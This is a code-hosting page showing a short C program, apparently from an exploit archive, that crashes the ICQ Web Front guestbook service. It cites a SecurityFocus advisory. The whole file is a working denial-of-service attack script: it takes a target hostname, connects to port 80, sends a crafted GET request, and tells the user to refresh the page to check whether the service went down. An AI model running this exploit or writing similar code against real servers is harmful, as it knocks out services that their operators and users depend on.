FilesExpand file tree

 master

/

20071.c

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

53 lines (44 loc) · 1.43 KB

 master

/

20071.c

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

53 lines (44 loc) · 1.43 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

source: http://www.securityfocus.com/bid/1463/info

The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter.

/* ICQ Web Front DoS */

#include <sys/socket.h>

#include <stdio.h>

#include <netinet/in.h>

#include <netdb.h>

void main(int argc, char *argv[])

{

int sock;

struct in_addr addr;

struct sockaddr_in sin;

struct hostent *he;

unsigned long start;

unsigned long end;

unsigned long counter;

/* added extra ? to be on the safe side :) */

char xploitstr1[50]="GET /?????????? HTTP/1.0 \n\n";

printf("ICQ Web Front DoS - author: char0hlz/tPG\n");

printf("The Poor Gurus' Network [http://www.tpgn.net]\n");

if (argc<2)

{

printf("usage: %s <hostname>\n", argv[0]);

exit(0);

}

if ((he=gethostbyname(argv[1])) == NULL)

{

herror("gethostbyname");

exit(0);

}

start=inet_addr(argv[1]);

counter=ntohl(start);

sock=socket(AF_INET,SOCK_STREAM,0);

bcopy(he->h_addr,(char *)&sin.sin_addr, he->h_length);

sin.sin_family=AF_INET;

sin.sin_port=htons(80);

if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0)

{

perror("pr0blemz");

}

send(sock,xploitstr1,strlen(xploitstr1),0);

close(sock);

printf("Done. Refresh the page to see if it worked.\n");

}